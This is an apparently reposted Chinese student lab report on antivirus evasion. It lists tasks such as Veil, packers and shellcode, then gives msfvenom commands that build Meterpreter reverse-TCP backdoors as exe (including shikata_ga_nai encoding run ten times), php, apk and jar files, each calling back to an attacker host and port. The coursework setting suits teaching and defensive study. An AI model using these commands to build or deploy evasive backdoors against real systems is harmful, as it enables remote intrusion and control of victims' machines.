标签：exe 免杀 Exp3 1328 tcp 生成 192.168 20181328 msfvenom

一、实验内容：

• 1.正确使用msf编码器，msfvenom生成如jar之类的其他文件
  • msfvenom生成php文件
  • msfvenom生成apk文件
  • msfvenom生成jar文件
  • veil
  • 使用C + shellcode编程
  • 加壳工具（压缩壳、加密壳）
• 2.通过组合应用各种技术实现恶意代码免杀
  • 免杀实践1
  • 免杀实践2
  • 免杀实践3（强一些）
• 3.用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本
  • 对免杀实践1做出的exe进行测试
  • 对免杀实践3做出的exe进行测试

二、实验要求：

• 1.报告格式范围，版面整洁 加0.5
• 2.报告排版混乱，加0分。
• 3.报告逻辑混乱表述不清或文字有明显抄袭可能 -1

 

三、实验步骤：

 

一、正确使用msf编码器

1.使用msfvenom -l encoders查看可以使用的编码器来生成不同的后门

 msfvenom -l encoders 

 

2.对实验二生成的20181328_backdoor.exe后门程序用VirusTotal进行扫描，结果如下图所示：

 

 

 

一次编码：

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.19.136 LPORT=1328 -f exe > csq-encoded.exe 

 

十次编码：

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.19.136 LPORT=1328 -f exe > csq-encoded10.exe

 

3.msfvenom生成php文件

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.19.136 lport=1328 x> zwq_backdoor.php

 

 4.msfvenom生成apk文件

 

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.19.136 lport=1328 x> zwq_backdoor.apk

 

 

 

 

 

 

5.msfvenom生成jar文件

 

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.19.136 LPORT=1328 x> zwq_backdoor_java.jar

 

 

 

 

标签：exe,免杀,Exp3,1328,tcp,生成,192.168,20181328,msfvenom
来源： https://www.cnblogs.com/1005zwq/p/14615960.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。